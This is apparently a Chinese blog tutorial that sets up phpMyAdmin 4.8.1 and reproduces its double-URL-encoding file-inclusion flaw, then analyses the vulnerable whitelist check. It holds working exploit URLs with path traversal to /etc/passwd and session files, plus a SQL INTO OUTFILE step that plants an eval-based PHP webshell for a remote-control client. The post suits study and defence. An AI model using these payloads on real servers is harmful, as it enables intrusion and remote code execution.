四十,phpMyAdmin 4.8.1后台文件包含漏洞复现及详解
yuyutoo 2024-10-13 00:42 6 浏览 0 评论
一.phpMyAdmin环境配置
PS:前面两部分内容会简单讲解phpMyAdmin 4.8.1版本配置过程,如果读者只想了解漏洞,可以从第三部分开始阅读。还请见谅~
phpMyAdmin是一种MySQL数据库的管理工具,安装该工具后,即可通过Web形式直接管理MySQL数据,而不需要通过执行系统命令来管理,非常适合对数据库操作命令不熟悉的数据库管理者,下面详细说明该工具的安装方法。
第一步,下载phpMyAdmin 4.8.1。
第二步,配置环境。
打开libraries目录下的config.default.php文件,依次找到下面各项,按照说明配置即可。
修改MySQL的用户名和密码,phpMyAdmin使用MySQL默认用户名root,密码设置为“123456”。
/**
* MySQL user
*
* @global string $cfg['Servers'][$i]['user']
*/
$cfg['Servers'][$i]['user'] = 'root';
/**
* MySQL password (only needed with 'config' auth_type)
*
* @global string $cfg['Servers'][$i]['password']
*/
$cfg['Servers'][$i]['password'] = '123456';
认证方法设置为“cookie”,登录phpMyAdmin时需要用户名和密码进行验证。在此有cookie、http、signon、config四种模式可供选择。
/**
* Authentication method (valid choices: config, http, signon or cookie)
*
* @global string $cfg['Servers'][$i]['auth_type']
*/
$cfg['Servers'][$i]['auth_type'] = 'cookie';
第三步,运行WAMP软件,并将WAMP中phpMyAdmin替换成4.8.1版本。
替换如下图所示:
运行Apache和MySQL如下图所示。
问题1: 当我们输入用户名“root”、密码“123456”时,很可能会报错“mysqli_real_connect(): (HY000/1045): Access denied for user ‘root’@‘localhost’ (using password: YES)”。提示是错误1045,告诉我们错误是由于没有访问权限,所以访问被拒绝了,主要原因就是由于该用户名所对应的密码错误。
第四步,检查配置文件中的主机、用户名和密码,并确认这些信息与 MySQL 服务器管理员所给出的信息一致。设置controluser和controlpass。
/**
* MySQL control user settings (this user must have read-only
* access to the "mysql/user" and "mysql/db" tables). The controluser is also
* used for all relational features (pmadb)
*
* @global string $cfg['Servers'][$i]['controluser']
*/
$cfg['Servers'][$i]['controluser'] = 'root';
/**
* MySQL control user settings (this user must have read-only
* access to the "mysql/user" and "mysql/db" tables). The controluser is also
* used for all relational features (pmadb)
*
* @global string $cfg['Servers'][$i]['controlpass']
*/
$cfg['Servers'][$i]['controlpass'] = '123456';
第五步,修改“config.sample.inc.php”(或config.inc.php)文件内容。
设置controluser和controlpass值。
修改如下:
$cfg['Servers'][$i]['controluser'] = 'root';
$cfg['Servers'][$i]['controlpass'] = '123456';
$cfg['Servers'][$i]['user'] = 'root';
$cfg['Servers'][$i]['password'] = '123456';
第六步,接着登录phpMyAdmin,输入“root”和“123456”之后进入数据库管理主界面。
二.phpMyAdmin基础用法
接着我们使用phpMyAdmin搭建一个简单的网站试试。
第一步,创建数据库。
第二步,创建数据表 student,点击执行。
第三步,设置表的字段,包括:id、username、password。
第四步,查看我们创建好的数据表student。
第五步,插入数据并查询。
INSERT INTO `student`(`id`, `username`, `password`) VALUES ('1', 'yangxiuzhang','6666666');
INSERT INTO `student`(`id`, `username`, `password`) VALUES ('2', 'Eastmountain','123456');
此时数据显示如下图所示:
第六步,编写PHP代码将我们数据库中的内容显示出来。
访问地址:http://localhost:8088/20200110.php
<?php
echo('<h2>数据库测试</h2>');
//链接数据库
$con = mysqli_connect("localhost", "root", "123456", "eastmount");
if (!$con)
{
die('Could not connect database: ' . mysqli_error());
}
//设置查询结果编码
$con->set_charset('utf8');
//查询学生信息
$sql = "SELECT * FROM `student` ";
//得到查询结果
$result = $con->query($sql);
//遍历结果
while($row = $result->fetch_array()){
list($id,$username, $password) = $row;
echo $id.' ';
echo $username.' ';
echo $password;
echo '<br >';
}
//关闭连接
$con->close();
?>
显示结果如下图所示:
如果需要查看配置信息,这使用“phpinfo()”函数实现。
<?php
phpinfo();
?>
显示结果如下图所示,PHP的配置信息。
写到这里,我们的环境已经搭建成功,接下来我们开始讲解phpMyAdmin漏洞吧。可能很多博友会疑惑,为什么前面花费这么多时间讲解环境搭建了,两个原因吧!一方面作者是从零开始学习,通过环境搭建来复现该漏洞;另一方面照顾初学者,希望通过通俗易懂的步骤能实现文章的实验,也希望安全圈的大牛们别笑,哈哈~都是一点一滴成长起来的。
三.phpMyAdmin漏洞复现
原因:phpMyadmin 4.8.1版本的index.php中存在文件包含漏洞,通过二次编码可绕过过滤。
第一步,根据该版本CVE漏洞构造URL,在index.php后添加内容,如显示/etc/passwd详细内容。
/* 方法一 */
http://localhost:8088/phpmyadmin/index.php?target=db_sql.php%253f/../../../../../../../../etc/passwd
/* 方法二 */
http://localhost:8088/phpmyadmin/index.php?target=db_datadict.php%253f/../../../../../../../../../Windows/DATE.ini
第二步,通过目录穿越包含任意文件。
第三步,执行SQL语句查询数据库路径。结果为:C:\xampp\mysql\data\。
show global variables like "%datadir%";
第四步,向数据库写入php代码。创建数据库rce和表rce,并插入php代码。
CREATE DATABASE rce;
use rce;
CREATE TABLE rce(code varchar(100));
INSERT INTO rce(code) VALUES("<?php phpinfo(); ?>");
输出结果如下图所示:
然后我们可以看到插入的php代码,如下所示。
第五步,在SQL中执行select ‘<?php phpinfo() ?>’,然后查看当前页面cookie中的phpmyadmin的值。
通过浏览器查看网络的Cookie值。
第六步,构建包含Session值的URL路径。
F12查看网站Session值,访问/index.php?target=db_sql.php%253f/…/…/…/…/…/…/tmp/sess_[session]。
?target=db_datadict.php%253f/../../../../../../../../../phpStudy/PHPTutorial/tmp/tmp/sess_imnnv91q886sfboa2sqos02b7njvho24
访问能显示如下图所示的信息:
第七步,在phpInfo默认页面找到网站的安装位置:/var/www/html,然后写入一句话木马。
select '<?php @eval($_POST[hcl]) ?>' into outfile '/var/www/html/hcl.php'
第八步,通过菜刀连接 http://ip/hcl.php。菜刀连接成功,在根目录下找到了key.txt文件,查看key.txt文件,获得key值。
简单总结:
利用phpMyAdmin 4.8.1后台文件包含漏洞,获取登录phpmyadmin系统所产生的sess_sessionID文件,然后通过文件绕过获取相关信息并植入木马,最终获取webshell。通常linux系统中存放路径为/tmp/sess_[当前会话session值]。
四.漏洞原理
在phpMyAdmin 4.8.1版本的index.php文件中,第50-63行代码如下:
$target_blacklist = array (
'import.php', 'export.php'
);
// If we have a valid target, let's load that script instead
if (! empty($_REQUEST['target'])
&& is_string($_REQUEST['target'])
&& ! preg_match('/^index/', $_REQUEST['target'])
&& ! in_array($_REQUEST['target'], $target_blacklist)
&& Core::checkPageValidity($_REQUEST['target'])
) {
include $_REQUEST['target'];
exit;
}
它的含义是:
target传入不能为空
target必须是一个字符串
target不能以index开头
target不能在数组target_blacklist中
target经过checkPageValidit检查后为真
前面三个大家都容易理解,第四个判断是黑名单判断。在index.php中已经定义好了target_blacklist的值,它们是import.php和export.php,只要不等于这两个值就可以。
再看第五个判断,Core::checkPageValidity($_REQUEST[‘target’]为真,通过全局搜索发现了代码在libraries\classes\Core.php文件的第443-476行。
public static function checkPageValidity(&$page, array $whitelist = [])
{
if (empty($whitelist)) {
$whitelist = self::$goto_whitelist;
}
if (! isset($page) || !is_string($page)) {
return false;
}
if (in_array($page, $whitelist)) {
return true;
}
$_page = mb_substr(
$page,
0,
mb_strpos($page . '?', '?')
);
if (in_array($_page, $whitelist)) {
return true;
}
$_page = urldecode($page);
$_page = mb_substr(
$_page,
0,
mb_strpos($_page . '?', '?')
);
if (in_array($_page, $whitelist)) {
return true;
}
return false;
}
在checkPageValidit中有两个形参,第一个是传入的target,第二个whitelist则有默认形参,也就是空的数组。进入函数首先会判断whitelist是否为空,如果为空则将定义的goto_whitelist赋值给whitelist(因为确实为空,我们只传进去一个target)。接着我们来看看goto_whitelist的代码。
public static $goto_whitelist = array(
'db_datadict.php',
'db_sql.php',
'db_events.php',
'db_export.php',
'db_importdocsql.php',
'db_multi_table_query.php',
'db_structure.php',
'db_import.php',
'db_operations.php',
'db_search.php',
'db_routines.php',
'export.php',
'import.php',
'index.php',
'pdf_pages.php',
'pdf_schema.php',
'server_binlog.php',
'server_collations.php',
'server_databases.php',
'server_engines.php',
'server_export.php',
'server_import.php',
'server_privileges.php',
'server_sql.php',
'server_status.php',
'server_status_advisor.php',
'server_status_monitor.php',
'server_status_queries.php',
'server_status_variables.php',
'server_variables.php',
'sql.php',
'tbl_addfield.php',
'tbl_change.php',
'tbl_create.php',
'tbl_import.php',
'tbl_indexes.php',
'tbl_sql.php',
'tbl_export.php',
'tbl_operations.php',
'tbl_structure.php',
'tbl_relation.php',
'tbl_replace.php',
'tbl_row_action.php',
'tbl_select.php',
'tbl_zoom_select.php',
'transformation_overview.php',
'transformation_wrapper.php',
'user_password.php',
);
接着分析代码,如果page在白名单中就会直接return true,但这里考虑到了可能带参数的情况,所以有了下面的判断。
下图的代码中,mb_strpos函数是查找string在另一个string中首次出现的位置。_page变量是获取page问号前的内容,是考虑到target有参数的情况,只要_page在白名单中就直接return true。但还考虑了url编码的情况,所以如果这步判断未成功,下一步又进行url解码。
当传入二次编码后的内容,会让checkPageValidity()这个函数返回true,但index中实际包含的内容却不是白名单中的文件。
例如:传入“?target=db_datadict.php%253f ”,由于服务器会自动解码一次,所以在checkPageValidity()中,page的值一开始会是“db_datadict.php%3f”,又一次url解码后变成了“db_datadict.php?”,这时符合了?前内容在白名单的要求,函数返回true。
但在index.php中_REQUEST[‘target’]仍然是“db_datadict.php%3f”,而且会被include,通过目录穿越,就可造成任意文件包含。最终通过该漏洞实现了上述攻击,这个漏洞也很快被修复并发布新版本。
五.总结
写到这里,这篇基础性文章就此结束,希望文章对您有所帮助。本文利用phpMyAdmin 4.8.1后台文件包含漏洞,获取登录phpmyadmin系统所产生的sess_sessionID文件,然后通过文件绕过获取相关信息并植入木马,最终获取webshell。同时,此漏洞是登陆后才可以使用的,比较鸡肋。一般登陆后直接执行SQL语句生成shell即可,但有时目录权限比较严格,不能在WEB目录内生成,则可以结合本例使用。
相关推荐
- 对volatile,synchronized,AQS的加锁解锁原理的一些理解
-
一、为什么要加锁,要实现同步多线程编程中,有可能会出现多个线程同时访问同一个共享、可变资源的情况,这个资源我们称之其为临界资源;这种资源可能是:对象、变量、文件等。...
- 注意,不能错过的CAS+volatile实现同步代码块
-
前言:最近看到有人说可以使用CAS+volatile实现同步代码块。心想,确实是可以实现的呀!因为AbstractQueuedSynchronizer(简称AQS)内部就是通过CAS+...
- 面试并发volatile关键字时,我们应该具备哪些谈资?
-
提前发现更多精彩内容,请访问https://dayarch.top/提前发现更多精彩内容,请访问https://dayarch.top/提前发现更多精彩内容,请访问https://dayarch...
- 无锁同步-JAVA之Volatile、Atomic和CAS
-
1、概要本文是无锁同步系列文章的第二篇,主要探讨JAVA中的原子操作,以及如何进行无锁同步。关于JAVA中的原子操作,我们很容易想到的是Volatile变量、java.util.concurrent....
- C/C++面试题(二):std::atomic与volatile
-
volatile是C/C++中的一个关键字,用于告知编译器某个变量的值可能会在程序的控制之外被意外修改(例如被硬件、中断服务程序、多线程环境或其他外部代理)。为了防止编译器对代码进行某些可能破坏...
- VOCs(Volatile Organic Compounds)挥发性有机化合物及测试方法
-
经常看到一些三防漆、涂料、油漆类产品的介绍中提到VOC、VOCs等概念,那么什么是VOC、VOCs和TVOC,VOCs主要包括哪些物质?VOCs的来源有哪些?VOCs的危害及国家标准是什么?一、V...
- 对volatile 及happen—before的理解
-
happen—before规则介绍Java...
- 这一篇我们来了解Synchronized、Volatile、Final关键字
-
题外话:蓝银王觉醒了!!--来自于一个斗罗大陆动漫爱好者(鹅,打钱!)湿兄这两天回家了,办了点大事,回来的时候我弟弟还舍不得我,哭着不愿意让我回京(我弟还是小学),我也心里很不舍,但是还是要回京奋斗...
- 关于 Java 关键字 volatile 的总结
-
1什么是volatilevolatile是Java的一个关键字,它提供了一种轻量级的同步机制。相比于重量级锁synchronized,volatile更为轻量级,因为它不会引起线程上下文...
- 大白话聊聊Java并发面试问题之volatile到底是什么?
-
用最简单的大白话,加上多张图给大家说一下,volatile到底是什么?...
- 为什么要有volatile关键字(volatile 关键字为什么不能保证原子性)
-
在嵌入式编程和多线程编程中,我们常会见到volatile关键字声明的变量。下面说一下volatile关键字的作用:1.保持变量内存可见简而言之就是用volatile声明的变量会告诉编译器和处理器,这个...
- Java的volatile到底怎么理解?(java volatitle)
-
我们都知道,在Java中有很多的关键字,比如synchronize比如volatile,这些都是一些比较关键的,还有final,今天我们就来聊一下这个volatile因为这个vo...
- Java多线程编程中的volatile关键字:解密神秘的共享内存
-
Java多线程编程中的volatile关键字:解密神秘的共享内存在Java多线程编程的世界里,volatile关键字就像一位低调却至关重要的守护者。它默默无闻地站岗放哨,确保多个线程之间能够正确地共享...
- 你了解volatile关键字的作用吗?(关键字volatile有什么含意?并举出三个不同的例子?)
-
【死记硬背】volatile关键字主要用于保持内存的变量可见性和禁止重排序。变量可见性:当一个线程改变了变量的值,那么新的值对于其他线程也是可以立即获取到的。禁止重排序:...
- 谈谈你对volatile 关键字作用和原理的理解
-
一位6年工作经验的小伙伴,在某里二面的时候被问到“volatile”关键字。然后,就没有然后了…同样,还有一位4年的小伙伴,去某团面试也被问到“volatile关键字“。然后,也没有然后了…...
你 发表评论:
欢迎- 一周热门
-
-
前端面试:iframe 的优缺点? iframe有那些缺点
-
带斜线的表头制作好了,如何填充内容?这几种方法你更喜欢哪个?
-
漫学笔记之PHP.ini常用的配置信息
-
推荐7个模板代码和其他游戏源码下载的网址
-
其实模版网站在开发工作中很重要,推荐几个参考站给大家
-
[干货] JAVA - JVM - 2 内存两分 [干货]+java+-+jvm+-+2+内存两分吗
-
正在学习使用python搭建自动化测试框架?这个系统包你可能会用到
-
织梦(Dedecms)建站教程 织梦建站详细步骤
-
【开源分享】2024PHP在线客服系统源码(搭建教程+终身使用)
-
2024PHP在线客服系统源码+完全开源 带详细搭建教程
-
- 最近发表
-
- 对volatile,synchronized,AQS的加锁解锁原理的一些理解
- 注意,不能错过的CAS+volatile实现同步代码块
- 面试并发volatile关键字时,我们应该具备哪些谈资?
- 无锁同步-JAVA之Volatile、Atomic和CAS
- C/C++面试题(二):std::atomic与volatile
- VOCs(Volatile Organic Compounds)挥发性有机化合物及测试方法
- 对volatile 及happen—before的理解
- 这一篇我们来了解Synchronized、Volatile、Final关键字
- 关于 Java 关键字 volatile 的总结
- 大白话聊聊Java并发面试问题之volatile到底是什么?
- 标签列表
-
- mybatis plus (70)
- scheduledtask (71)
- css滚动条 (60)
- java学生成绩管理系统 (59)
- 结构体数组 (69)
- databasemetadata (64)
- javastatic (68)
- jsp实用教程 (53)
- fontawesome (57)
- widget开发 (57)
- vb net教程 (62)
- hibernate 教程 (63)
- case语句 (57)
- svn连接 (74)
- directoryindex (69)
- session timeout (58)
- textbox换行 (67)
- extension_dir (64)
- linearlayout (58)
- vba高级教程 (75)
- iframe用法 (58)
- sqlparameter (59)
- trim函数 (59)
- flex布局 (63)
- contextloaderlistener (56)